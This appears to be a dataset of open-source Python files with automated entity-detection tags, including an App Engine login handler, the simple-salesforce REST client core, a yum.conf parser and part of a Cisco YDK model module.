'letters.na'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'letters.id'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'org.id'], ['URL', 'allowance.id'], ['URL', 'service.id'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'service.id'], ['URL', 'service.us'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'template.se'], ['URL', 'template.id'], ['URL', 'template.ve'], ['URL', 'service.id'], ['URL', 'by.id'], ['URL', 'service.cr'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'message.se'], ['URL', 'message.ar'], ['URL', 'www.notifications.service.gov.uk'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com'], ['URL', 'db.session.ad'], ['URL', 'db.session.com']]"
100,"# -*- coding: utf-8 -*-
import os
import uuid
import datetime
from google.appengine.ext import webapp
from google.appengine.api import users
from google.appengine.ext import db
from google.appengine.api import mail
from google.appengine.ext.webapp import template
from django.utils import simplejson as json
from google.appengine.api import urlfetch
import urllib
import conf
import app.FlyingClub
import app.CoreHandler
from app.models import Comment, Crew
class AuthHandler(webapp.RequestHandler):
###################################################################################################
## Get Actions
###################################################################################################
def get(self, section=None, page=None):
#sessID = self.do_cookie_check()
section = 'auth'
template_vars = {}
App = app.FlyingClub.FlyingClub(section, page)
template_vars['app'] = App
#tvars['appo'] = Appo
#tvars['conf'] = conf
#tvars['user'] = None
#template_vars['crewID'] = crewID
#f 'sessIdent' in self.request.cookies:
#sessIdent = self.request.cookies['sessIdent']
#lse:
# sessIdent = None
## Setup Section and Page
#if section == None:
#section = ""index""
#template_vars['section'] = section
#template_vars['page'] = page
## Get Comments
q = db.GqlQuery(""SELECT * FROM Comment "" +
""WHERE section = :1 "" +
""ORDER BY dated DESC"",
section)
results = q.fetch(50)
#template_vars['comments'] = results
## Application Object
#template_vars['page_title'] = Appo.title(""/%s/"" % section)
## Setup User + Aauth
#user = users.get_current_user()
#if not user:
# template_vars['user'] = None
# template_vars['login_url'] = users.create_login_url(""/set_session/"")
#else:
# template_vars['user'] = user
# template_vars['logout_url'] = users.create_logout_url(""/subscribe/"")
## Sign In Section
#if section == 'ssignin' :
# if sessID:
# self.redirect(""/profile/"")
# return
#template_vars['page_title'] = 'Sign In with OpenId'
#if section == 'sdo_logout':
# cook_str = 'sessID=%s; expires=Fri, 31-Dec-1980 23:59:59 GMT; Path=/;' % ''
# self.response.headers.add_header( 'Set-Cookie',
# cook_str
# )
# self.redirect(""/"")
# return
#if section == 'sprofile':
# if not sessID:
# self.redirect(""/signin/"")
# return
#template_vars['welcome'] = True if self.request.get(""welcome"") == '1' else False
#template_vars['page_title'] = 'My Profile'
main_template = '%s.html' % (section)
path = '/%s/' % (section)
#template_vars['path'] = path
template_path = os.path.join(os.path.dirname(__file__), '../templates/pages/%s' % main_template)
self.response.out.write(template.render(template_path, template_vars))
###################################################################################################
## Post Actions
###################################################################################################
def post(self, page=None):
if page == 'rpx':
token = self.request.get('token')
url = 'https://rpxnow.com/api/v2/auth_info'
args = {
'format': 'json',
'apiKey': conf.RPX_API_KEY,
'token': token
}
r = urlfetch.fetch( url=url,
payload=urllib.urlencode(args),
method=urlfetch.POST,
headers={'Content-Type':'application/x-www-form-urlencoded'}
)
data = json.loads(r.content)
if data['stat'] == 'ok':
welcome = 0
unique_identifier = data['profile']['identifier']
q = db.GqlQuery(""select * from Crew where ident= :1"", unique_identifier)
crew = q.get()
if not crew:
crew = Crew(ident=unique_identifier)
crew.name = data['profile']['preferredUsername']
if data['profile'].has_key('email'):
crew.email = data['profile']['email']
crew.put()
welcome = 1
subject = ""New Login: %s"" % crew.name
body = ""New login on schedule""
else:
subject = ""Return Login: %s"" % crew.name
body = ""New login on schedule""
sessID = str(crew.key())
cook_str = 'crewID=%s; expires=Fri, 31-Dec-2020 23:59:59 GMT; Path=/;' % crew.id()
self.response.headers.add_header( 'Set-Cookie',
cook_str
)
mail.send_mail( sender = conf.EMAIL,
to = ""Dev dummy@email.com"",
subject = subject,
body = body
)
self.redirect(""/profile/?welcome=%s"" % welcome)
return
else:
print section, page
#self.redirect(""/"")
",4533,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', ""https://rpxnow.com/api/v2/auth_info'""], ['PERSON', ""template_vars['app""], ['URL', 'users.cr'], ['URL', 'users.cr'], ['PERSON', '#'], ['DATE_TIME', '23:59:59 GMT'], ['URL', 'r.co'], ['PERSON', ""data['profile']['identifier""], ['NRP', 'sessID'], ['DATE_TIME', '31-Dec-2020'], ['DATE_TIME', '23:59:59 GMT'], ['PERSON', 'EMAIL'], ['DATE_TIME', '31-Dec-1980'], ['URL', 'app.Co'], ['URL', 'app.mo'], ['URL', 'webapp.Re'], ['URL', 'self.do'], ['URL', 'self.request.co'], ['URL', 'self.request.co'], ['URL', 'db.Gq'], ['URL', 'users.ge'], ['URL', 'self.red'], ['URL', 'self.response.headers.ad'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'self.request.ge'], ['URL', 's.ht'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.request.ge'], ['URL', 'db.Gq'], ['URL', 'q.ge'], ['URL', 'crew.na'], ['URL', 'crew.na'], ['URL', 'crew.na'], ['URL', 'crew.ke'], ['URL', 'crew.id'], ['URL', 'self.response.headers.ad'], ['URL', 'mail.se'], ['URL', 'email.com'], ['URL', 'self.red'], ['URL', 'self.red']]"
101,"""""""Core classes and exceptions for Simple-Salesforce""""""
# has to be defined prior to login import
DEFAULT_API_VERSION = '29.0'
import requests
import json
try:
from urlparse import urlparse
except ImportError:
# Python 3+
from urllib.parse import urlparse
from simple_salesforce.login import SalesforceLogin
from simple_salesforce.util import date_to_iso8601, SalesforceError
try:
from collections import OrderedDict
except ImportError:
# Python < 2.7
from ordereddict import OrderedDict
class Salesforce(object):
""""""Salesforce Instance
An instance of Salesforce is a handy way to wrap a Salesforce session
for easy use of the Salesforce REST API.
""""""
def __init__(
self, username=None, password=None, security_token=None,
session_id=None, instance=None, instance_url=None,
organizationId=None, sandbox=False, version=DEFAULT_API_VERSION,
proxies=None, session=None):
""""""Initialize the instance with the given parameters.
Available kwargs
Password Authentication:
* username -- the Salesforce username to use for authentication
* password -- the password for the username
* security_token -- the security token for the username
* sandbox -- True if you want to login to `test.salesforce.com`, False
if you want to login to `login.salesforce.com`.
Direct Session and Instance Access:
* session_id -- Access token for this session
Then either
* instance -- Domain of your Salesforce instance, i.e. `na1.salesforce.com`
OR
* instance_url -- Full URL of your instance i.e. `https://na1.salesforce.com
Universal Kwargs:
* version -- the version of the Salesforce API to use, for example `29.0`
* proxies -- the optional map of scheme to proxy server
* session -- Custom requests session, created in calling code. This
enables the use of requets Session features not otherwise
exposed by simple_salesforce.
""""""
# Determine if the user passed in the optional version and/or sandbox kwargs
self.sf_version = version
self.sandbox = sandbox
self.proxies = proxies
# Determine if the user wants to use our username/password auth or pass in their own information
if all(arg is not None for arg in (username, password, security_token)):
self.auth_type = ""password""
# Pass along the username/password to our login helper
self.session_id, self.sf_instance = SalesforceLogin(
session=session,
username=username,
password=password,
security_token=security_token,
sandbox=self.sandbox,
sf_version=self.sf_version,
proxies=self.proxies)
elif all(arg is not None for arg in (session_id, instance or instance_url)):
self.auth_type = ""direct""
self.session_id = session_id
# If the user provides the full url (as returned by the OAuth interface for
# example) extract the hostname (which we rely on)
if instance_url is not None:
self.sf_instance = urlparse(instance_url).hostname
else:
self.sf_instance = instance
elif all(arg is not None for arg in (username, password, organizationId)):
self.auth_type = 'ipfilter'
# Pass along the username/password to our login helper
self.session_id, self.sf_instance = SalesforceLogin(
session=session,
username=username,
password=password,
organizationId=organizationId,
sandbox=self.sandbox,
sf_version=self.sf_version,
proxies=self.proxies)
else:
raise TypeError(
'You must provide login information or an instance and token'
)
if self.sandbox:
self.auth_site = 'https://test.salesforce.com'
else:
self.auth_site = 'https://login.salesforce.com'
self.request = session or requests.Session()
self.request.proxies = self.proxies
self.headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + self.session_id,
'X-PrettyPrint': '1'
}
self.base_url = ('https://{instance}/services/data/v{version}/'
.format(instance=self.sf_instance,
version=self.sf_version))
self.apex_url = ('https://{instance}/services/apexrest/'
.format(instance=self.sf_instance))
def describe(self):
url = self.base_url + ""sobjects""
result = self.request.get(url, headers=self.headers)
if result.status_code != 200:
raise SalesforceGeneralError(url,
'describe',
result.status_code,
result.content)
json_result = result.json(object_pairs_hook=OrderedDict)
if len(json_result) == 0:
return None
else:
return json_result
# SObject Handler
def __getattr__(self, name):
""""""Returns an `SFType` instance for the given Salesforce object type
(given in `name`).
The magic part of the SalesforceAPI, this function translates
calls such as `salesforce_api_instance.Lead.metadata()` into fully
constituted `SFType` instances to make a nice Python API wrapper
for the REST API.
Arguments:
* name -- the name of a Salesforce object type, e.g. Lead or Contact
""""""
# fix to enable serialization (https://github.com/heroku/simple-salesforce/issues/60)
if name.startswith('__'):
return super(Salesforce, self).__getattr__(name)
return SFType(name, self.session_id, self.sf_instance, self.sf_version, self.proxies)
# User utlity methods
def set_password(self, user, password):
""""""Sets the password of a user
salesforce dev documentation link:
https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm
Arguments:
* user: the userID of the user to set
* password: the new password
""""""
url = self.base_url + 'sobjects/User/%s/password' % user
params = { 'NewPassword' : password, }
result = self.request.post(url, headers=self.headers, data=json.dumps(params))
# salesforce return 204 No Content when the request is successful
if result.status_code != 200 and result.status_code != 204:
raise SalesforceGeneralError(url,
'User',
result.status_code,
result.content)
json_result = result.json(object_pairs_hook=OrderedDict)
if len(json_result) == 0:
return None
else:
return json_result
def setPassword(self, user, password):
import warnings
warnings.warn(
""This method has been deprecated. Please use set_password instread."", DeprecationWarning)
return self.set_password(user, password)
# Generic Rest Function
def restful(self, path, params):
""""""Allows you to make a direct REST call if you know the path
Arguments:
* path: The path of the request
Example: sobjects/User/ABC123/password'
* params: dict of parameters to pass to the path
""""""
url = self.base_url + path
result = self.request.get(url, headers=self.headers, params=params)
if result.status_code != 200:
raise SalesforceGeneralError(url,
path,
result.status_code,
result.content)
json_result = result.json(object_pairs_hook=OrderedDict)
if len(json_result) == 0:
return None
else:
return json_result
# Search Functions
def search(self, search):
""""""Returns the result of a Salesforce search as a dict decoded from
the Salesforce response JSON payload.
Arguments:
* search -- the fully formatted SOSL search string, e.g.
`FIND {Waldo}`
""""""
url = self.base_url + 'search/'
# `requests` will correctly encode the query string passed as `params`
params = {'q': search}
result = self.request.get(url, headers=self.headers, params=params)
if result.status_code != 200:
raise SalesforceGeneralError(url,
'search',
result.status_code,
result.content)
json_result = result.json(object_pairs_hook=OrderedDict)
if len(json_result) == 0:
return None
else:
return json_result
def quick_search(self, search):
""""""Returns the result of a Salesforce search as a dict decoded from
the Salesforce response JSON payload.
Arguments:
* search -- the non-SOSL search string, e.g. `Waldo`. This search
string will be wrapped to read `FIND {Waldo}` before being
sent to Salesforce
""""""
search_string = u'FIND {{{search_string}}}'.format(search_string=search)
return self.search(search_string)
# Query Handler
def query(self, query, **kwargs):
""""""Return the result of a Salesforce SOQL query as a dict decoded from
the Salesforce response JSON payload.
Arguments:
* query -- the SOQL query to send to Salesforce, e.g.
`SELECT Id FROM Lead WHERE Email = dummy@email.com""`
""""""
url = self.base_url + 'query/'
params = {'q': query}
# `requests` will correctly encode the query string passed as `params`
result = self.request.get(url, headers=self.headers, params=params, **kwargs)
if result.status_code != 200:
_exception_handler(result)
return result.json(object_pairs_hook=OrderedDict)
def query_more(self, next_records_identifier, identifier_is_url=False, **kwargs):
""""""Retrieves more results from a query that returned more results
than the batch maximum. Returns a dict decoded from the Salesforce
response JSON payload.
Arguments:
* next_records_identifier -- either the Id of the next Salesforce
object in the result, or a URL to the
next record in the result.
* identifier_is_url -- True if `next_records_identifier` should be
treated as a URL, False if
`next_records_identifer` should be treated as
an Id.
""""""
if identifier_is_url:
# Don't use `self.base_url` here because the full URI is provided
url = (u'https://{instance}{next_record_url}'
.format(instance=self.sf_instance,
next_record_url=next_records_identifier))
else:
url = self.base_url + 'query/{next_record_id}'
url = url.format(next_record_id=next_records_identifier)
result = self.request.get(url, headers=self.headers, **kwargs)
if result.status_code != 200:
_exception_handler(result)
return result.json(object_pairs_hook=OrderedDict)
def query_all(self, query, **kwargs):
""""""Returns the full set of results for the `query`. This is a
convenience wrapper around `query(...)` and `query_more(...)`.
The returned dict is the decoded JSON payload from the final call to
Salesforce, but with the `totalSize` field representing the full
number of results retrieved and the `records` list representing the
full list of records retrieved.
Arguments
* query -- the SOQL query to send to Salesforce, e.g.
`SELECT Id FROM Lead WHERE Email = dummy@email.com""`
""""""
def get_all_results(previous_result, **kwargs):
""""""Inner function for recursing until there are no more results.
Returns the full set of results that will be the return value for
`query_all(...)`
Arguments:
* previous_result -- the modified result of previous calls to
Salesforce for this query
""""""
if previous_result['done']:
return previous_result
else:
result = self.query_more(previous_result['nextRecordsUrl'],
identifier_is_url=True, **kwargs)
result['totalSize'] += previous_result['totalSize']
# Include the new list of records with the previous list
previous_result['records'].extend(result['records'])
result['records'] = previous_result['records']
# Continue the recursion
return get_all_results(result, **kwargs)
# Make the initial query to Salesforce
result = self.query(query, **kwargs)
# The number of results might have exceeded the Salesforce batch limit
# so check whether there are more results and retrieve them if so.
return get_all_results(result, **kwargs)
def apexecute(self, action, method='GET', data=None, **kwargs):
""""""Makes an HTTP request to an APEX REST endpoint
Arguments:
* action -- The REST endpoint for the request.
* method -- HTTP method for the request (default GET)
* data -- A dict of parameters to send in a POST / PUT request
* kwargs -- Additional kwargs to pass to `requests.request`
""""""
result = self._call_salesforce(method, self.apex_url + action,
data=json.dumps(data), **kwargs)
if result.status_code == 200:
try:
response_content = result.json()
except Exception:
response_content = result.text
return response_content
def _call_salesforce(self, method, url, **kwargs):
""""""Utility method for performing HTTP call to Salesforce.
Returns a `requests.result` object.
""""""
result = self.request.request(method, url, headers=self.headers, **kwargs)
if result.status_code >= 300:
_exception_handler(result)
return result
class SFType(object):
""""""An interface to a specific type of SObject""""""
def __init__(self, object_name, session_id, sf_instance, sf_version='27.0', proxies=None):
""""""Initialize the instance with the given parameters.
Arguments:
* object_name -- the name of the type of SObject this represents,
e.g. `Lead` or `Contact`
* session_id -- the session ID for authenticating to Salesforce
* sf_instance -- the domain of the instance of Salesforce to use
* sf_version -- the version of the Salesforce API to use
* proxies -- the optional map of scheme to proxy server
""""""
self.session_id = session_id
self.name = object_name
self.request = requests.Session()
self.request.proxies = proxies
self.base_url = (u'https://{instance}/services/data/v{sf_version}/sobjects/{object_name}/'
.format(instance=sf_instance,
object_name=object_name,
sf_version=sf_version))
def metadata(self):
""""""Returns the result of a GET to `.../{object_name}/` as a dict
decoded from the JSON payload returned by Salesforce.
""""""
result = self._call_salesforce('GET', self.base_url)
return result.json(object_pairs_hook=OrderedDict)
def describe(self):
""""""Returns the result of a GET to `.../{object_name}/describe` as a
dict decoded from the JSON payload returned by Salesforce.
""""""
result = self._call_salesforce('GET', self.base_url + 'describe')
return result.json(object_pairs_hook=OrderedDict)
def describe_layout(self, record_id):
""""""Returns the result of a GET to `.../{object_name}/describe/layouts/` as a
dict decoded from the JSON payload returned by Salesforce.
""""""
result = self._call_salesforce('GET', self.base_url + 'describe/layouts/' + record_id)
return result.json(object_pairs_hook=OrderedDict)
def get(self, record_id):
""""""Returns the result of a GET to `.../{object_name}/{record_id}` as a
dict decoded from the JSON payload returned by Salesforce.
Arguments:
* record_id -- the Id of the SObject to get
""""""
result = self._call_salesforce('GET', self.base_url + record_id)
return result.json(object_pairs_hook=OrderedDict)
def get_by_custom_id(self, custom_id_field, custom_id):
""""""Returns the result of a GET to `.../{object_name}/{custom_id_field}/{custom_id}` as a
dict decoded from the JSON payload returned by Salesforce.
Arguments:
* custom_id_field -- the API name of a custom field that was defined as an External ID
* custom_id - the External ID value of the SObject to get
""""""
custom_url = self.base_url + '{custom_id_field}/{custom_id}'.format(
custom_id_field=custom_id_field, custom_id=custom_id)
result = self._call_salesforce('GET', custom_url)
return result.json(object_pairs_hook=OrderedDict)
def create(self, data):
""""""Creates a new SObject using a POST to `.../{object_name}/`.
Returns a dict decoded from the JSON payload returned by Salesforce.
Arguments:
* data -- a dict of the data to create the SObject from. It will be
JSON-encoded before being transmitted.
""""""
result = self._call_salesforce('POST', self.base_url,
data=json.dumps(data))
return result.json(object_pairs_hook=OrderedDict)
def upsert(self, record_id, data, raw_response=False):
""""""Creates or updates an SObject using a PATCH to
`.../{object_name}/{record_id}`.
If `raw_response` is false (the default), returns the status code
returned by Salesforce. Otherwise, return the `requests.Response`
object.
Arguments:
* record_id -- an identifier for the SObject as described in the
Salesforce documentation
* data -- a dict of the data to create or update the SObject from. It
will be JSON-encoded before being transmitted.
* raw_response -- a boolean indicating whether to return the response
directly, instead of the status code.
""""""
result = self._call_salesforce('PATCH', self.base_url + record_id,
data=json.dumps(data))
return self._raw_response(result, raw_response)
def update(self, record_id, data, raw_response=False):
""""""Updates an SObject using a PATCH to
`.../{object_name}/{record_id}`.
If `raw_response` is false (the default), returns the status code
returned by Salesforce. Otherwise, return the `requests.Response`
object.
Arguments:
* record_id -- the Id of the SObject to update
* data -- a dict of the data to update the SObject from. It will be
JSON-encoded before being transmitted.
* raw_response -- a boolean indicating whether to return the response
directly, instead of the status code.
""""""
result = self._call_salesforce('PATCH', self.base_url + record_id,
data=json.dumps(data))
return self._raw_response(result, raw_response)
def delete(self, record_id, raw_response=False):
""""""Deletes an SObject using a DELETE to
`.../{object_name}/{record_id}`.
If `raw_response` is false (the default), returns the status code
returned by Salesforce. Otherwise, return the `requests.Response`
object.
Arguments:
* record_id -- the Id of the SObject to delete
* raw_response -- a boolean indicating whether to return the response
directly, instead of the status code.
""""""
result = self._call_salesforce('DELETE', self.base_url + record_id)
return self._raw_response(result, raw_response)
def deleted(self, start, end):
""""""Use the SObject Get Deleted resource to get a list of deleted records for the specified object.
.../deleted/?start=2013-05-05T00:00:00+00:00&end=2013-05-10T00:00:00+00:00
* start -- start datetime object
* end -- end datetime object
""""""
url = self.base_url + 'deleted/?start={start}&end={end}'.format(
start=date_to_iso8601(start), end=date_to_iso8601(end))
result = self._call_salesforce('GET', url)
return result.json(object_pairs_hook=OrderedDict)
def updated(self, start, end):
""""""Use the SObject Get Updated resource to get a list of updated (modified or added)
records for the specified object.
.../updated/?start=2014-03-20T00:00:00+00:00&end=2014-03-22T00:00:00+00:00
* start -- start datetime object
* end -- end datetime object
""""""
url = self.base_url + 'updated/?start={start}&end={end}'.format(
start=date_to_iso8601(start), end=date_to_iso8601(end))
result = self._call_salesforce('GET', url)
return result.json(object_pairs_hook=OrderedDict)
def _call_salesforce(self, method, url, **kwargs):
""""""Utility method for performing HTTP call to Salesforce.
Returns a `requests.result` object.
""""""
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + self.session_id,
'X-PrettyPrint': '1'
}
result = self.request.request(method, url, headers=headers, **kwargs)
if result.status_code >= 300:
_exception_handler(result, self.name)
return result
def _raw_response(self, response, body_flag):
""""""Utility method for processing the response and returning either the
status code or the response object.
Returns either an `int` or a `requests.Response` object.
""""""
if not body_flag:
return response.status_code
else:
return response
class SalesforceAPI(Salesforce):
""""""Depreciated SalesforceAPI Instance
This class implements the Username/Password Authentication Mechanism using Arguments
It has since been surpassed by the 'Salesforce' class, which relies on kwargs
""""""
def __init__(self, username, password, security_token, sandbox=False,
sf_version='27.0'):
""""""Initialize the instance with the given parameters.
Arguments:
* username -- the Salesforce username to use for authentication
* password -- the password for the username
* security_token -- the security token for the username
* sandbox -- True if you want to login to `test.salesforce.com`, False
if you want to login to `login.salesforce.com`.
* sf_version -- the version of the Salesforce API to use, for example
""27.0""
""""""
import warnings
warnings.warn(
""Use of login arguments has been depreciated. Please use kwargs"",
DeprecationWarning
)
super(SalesforceAPI, self).__init__(username=username,
password=password,
security_token=security_token,
sandbox=sandbox,
version=sf_version)
def _exception_handler(result, name=""""):
""""""Exception router. Determines which error to raise for bad results""""""
try:
response_content = result.json()
except Exception:
response_content = result.text
exc_map = {
300: SalesforceMoreThanOneRecord,
400: SalesforceMalformedRequest,
401: SalesforceExpiredSession,
403: SalesforceRefusedRequest,
404: SalesforceResourceNotFound,
}
exc_cls = exc_map.get(result.status_code, SalesforceGeneralError)
raise exc_cls(result.url, result.status_code, name, response_content)
class SalesforceMoreThanOneRecord(SalesforceError):
""""""
Error Code: 300
The value returned when an external ID exists in more than one record. The
response body contains the list of matching records.
""""""
message = u""More than one record for {url}. Response content: {content}""
class SalesforceMalformedRequest(SalesforceError):
""""""
Error Code: 400
The request couldn't be understood, usually becaue the JSON or XML body contains an error.
""""""
message = u""Malformed request {url}. Response content: {content}""
class SalesforceExpiredSession(SalesforceError):
""""""
Error Code: 401
The session ID or OAuth token used has expired or is invalid. The response
body contains the message and errorCode.
""""""
message = u""Expired session for {url}. Response content: {content}""
class SalesforceRefusedRequest(SalesforceError):
""""""
Error Code: 403
The request has been refused. Verify that the logged-in user has
appropriate permissions.
""""""
message = u""Request refused for {url}. Response content: {content}""
class SalesforceResourceNotFound(SalesforceError):
""""""
Error Code: 404
The requested resource couldn't be found. Check the URI for errors, and
verify that there are no sharing issues.
""""""
message = u'Resource {name} Not Found. Response content: {content}'
def __str__(self):
return self.message.format(name=self.resource_name,
content=self.content)
class SalesforceGeneralError(SalesforceError):
""""""
A non-specific Salesforce error.
""""""
message = u'Error Code {status}. Response content: {content}'
def __str__(self):
return self.message.format(status=self.status, content=self.content)
",27053,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://na1.salesforce.com'], ['URL', 'https://www.salesforce.com/us/developer/docs/api_rest/Content/dome_sobject_user_password.htm'], ['DATE_TIME', ""'29.0'""], ['URL', 'urllib.pa'], ['NRP', 'OrderedDict'], ['PERSON', 'ordereddict import'], ['PERSON', 'OrderedDict'], ['LOCATION', 'security_token'], ['PERSON', 'simple_salesforce'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['URL', 'self.au'], ['PERSON', 'self.sf_instance ='], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['LOCATION', 'SalesforceAPI'], ['PERSON', 'name.startswith'], ['LOCATION', 'self.sf_instance'], ['URL', 'self.ba'], ['URL', 'self.re'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['URL', 'result.st'], ['PERSON', 'json_result = result.json(object_pairs_hook=OrderedDict'], ['PERSON', 'Waldo'], ['NRP', 'SOQL'], ['URL', 'self.ba'], ['URL', 'self.request.ge'], ['PERSON', 'exception_handler(result'], ['NRP', 'query_more(self'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'url.fo'], ['URL', 'self.request.ge'], ['PERSON', 'exception_handler(result'], ['NRP', 'SOQL'], ['NRP', 'previous_result'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'session_id'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['LOCATION', 'custom_id_field'], ['PERSON', 'custom_id_field'], ['URL', 'self.ba'], ['LOCATION', 'custom_id_field'], ['LOCATION', 'custom_id_field'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['URL', 'self.ba'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['LOCATION', 'security_token'], ['PERSON', 'exception_handler(result'], ['LOCATION', 'SalesforceResourceNotFound'], ['URL', 'result.st'], ['URL', 'https://test.salesforce.com'], ['URL', 'https://login.salesforce.com'], ['URL', 'https://github.com/heroku/simple-salesforce/issues/60'], ['URL', 'test.salesforce.com'], ['URL', 'login.salesforce.com'], ['URL', 'na1.salesforce.com'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.au'], ['URL', 'self.se'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.se'], ['URL', 'self.au'], ['URL', 'self.se'], ['URL', 'self.sa'], ['URL', 'self.pro'], ['URL', 'self.sa'], ['URL', 'self.au'], ['URL', 'self.au'], ['URL', 'self.re'], ['URL', 'requests.Se'], ['URL', 'self.request.pro'], ['URL', 'self.pro'], ['URL', 'self.se'], ['URL', 'result.co'], ['URL', 'instance.Lead.me'], ['URL', 'name.st'], ['URL', 'self.se'], ['URL', 'self.pro'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'result.st'], ['URL', 'result.co'], ['URL', 'self.se'], ['URL', 'email.com'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'email.com'], ['URL', 'requests.re'], ['URL', 'result.st'], ['URL', 'requests.re'], ['URL', 'self.request.re'], ['URL', 'result.st'], ['URL', 'self.se'], ['URL', 'self.na'], ['URL', 'self.re'], ['URL', 'requests.Se'], ['URL', 'self.request.pro'], ['URL', 'requests.Re'], ['URL', 'requests.Re'], ['URL', 'requests.Re'], ['URL', 'requests.re'], ['URL', 'self.se'], ['URL', 'self.request.re'], ['URL', 'result.st'], ['URL', 'self.na'], ['URL', 'requests.Re'], ['URL', 'response.st'], ['URL', 'test.salesforce.com'], ['URL', 'login.salesforce.com'], ['URL', 'map.ge'], ['URL', 'result.st'], ['URL', 'self.message.fo'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'self.message.fo'], ['URL', 'self.st'], ['URL', 'self.co']]"
102,"""""""
YumConf - file ``/etc/yum.conf``
================================
This module provides parsing for the ``/etc/yum.conf`` file.
The ``YumConf`` class parses the information in the file
``/etc/yum.conf``. See the ``IniConfigFile`` class for more
information on attributes and methods.
Sample input data looks like::
[main]
cachedir=/var/cache/yum/$basearch/$releasever
keepcache=0
debuglevel=2
logfile=/var/log/yum.log
exactarch=1
obsoletes=1
gpgcheck=1
plugins=1
installonly_limit=3
[rhel-7-server-rpms]
metadata_expire = 86400
baseurl = https://cdn.redhat.com/content/rhel/server/7/$basearch
name = Red Hat Enterprise Linux 7 Server (RPMs)
gpgkey = PI:KEY
enabled = 1
gpgcheck = 1
Examples:
>>> yconf = shared[YumConf]
>>> yconf.defaults()
{'admin_token': 'ADMIN', 'compute_port': '8774'}
>>> 'main' in yconf
True
>>> 'rhel-7-server-rpms' in yconf
True
>>> yconf.has_option('main', 'gpgcheck')
True
>>> yconf.has_option('main', 'foo')
False
>>> yconf.get('rhel-7-server-rpms', 'enabled')
'1'
>>> yconf.items('main')
{'plugins': '1',
'keepcache': '0',
'cachedir': '/var/cache/yum/$basearch/$releasever',
'exactarch': '1',
'obsoletes': '1',
'installonly_limit': '3',
'debuglevel': '2',
'gpgcheck': '1',
'logfile': '/var/log/yum.log'}
""""""
from insights.contrib.ConfigParser import NoOptionError
from .. import parser, IniConfigFile
from insights.specs import yum_conf
@parser(yum_conf)
class YumConf(IniConfigFile):
""""""Parse contents of file ``/etc/yum.conf``.""""""
def parse_content(self, content):
super(YumConf, self).parse_content(content)
# File /etc/yum.conf may contain repos definitions.
# Keywords 'gpgkey' and 'baseurl' might contain multiple
# values separated by comma. Convert those values into a list.
for section in self.sections():
for key in ('gpgkey', 'baseurl'):
try:
value = self.get(section, key)
if value and isinstance(value, str):
self.data.set(section, key, value.split(','))
except NoOptionError:
pass
",2282,"[['URL', 'https://cdn.redhat.com/content/rhel/server/7/$basearch'], ['PERSON', 'YumConf'], ['PERSON', 'admin_token'], ['PERSON', 'keepcache'], ['PERSON', 'exactarch'], ['PERSON', 'obsoletes'], ['LOCATION', 'insights.contrib'], ['PERSON', 'Parse'], ['IP_ADDRESS', 'e::\n\n '], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'yconf.de'], ['URL', 'yconf.ge'], ['URL', 'yconf.it'], ['URL', 'insights.contrib.Co'], ['URL', 'yum.co'], ['URL', 'yum.co'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'self.data.se']]"
103,""""""" Cisco_IOS_XR_man_xml_ttyagent_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR man\-xml\-ttyagent package operational data.
This module contains definitions
for the following management objects\:
netconf\: NETCONF operational information
xr\-xml\: xr xml
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
""""""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class XrXmlSessionAlarmRegisterEnum(Enum):
""""""
XrXmlSessionAlarmRegisterEnum
AlarmNotify
.. data:: registered = 1
Registered
.. data:: not_registered = 2
NotRegistered
""""""
registered = 1
not_registered = 2
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta
return meta._meta_table['XrXmlSessionAlarmRegisterEnum']
class XrXmlSessionStateEnum(Enum):
""""""
XrXmlSessionStateEnum
SessionState
.. data:: idle = 1
Idle
.. data:: busy = 2
Busy
""""""
idle = 1
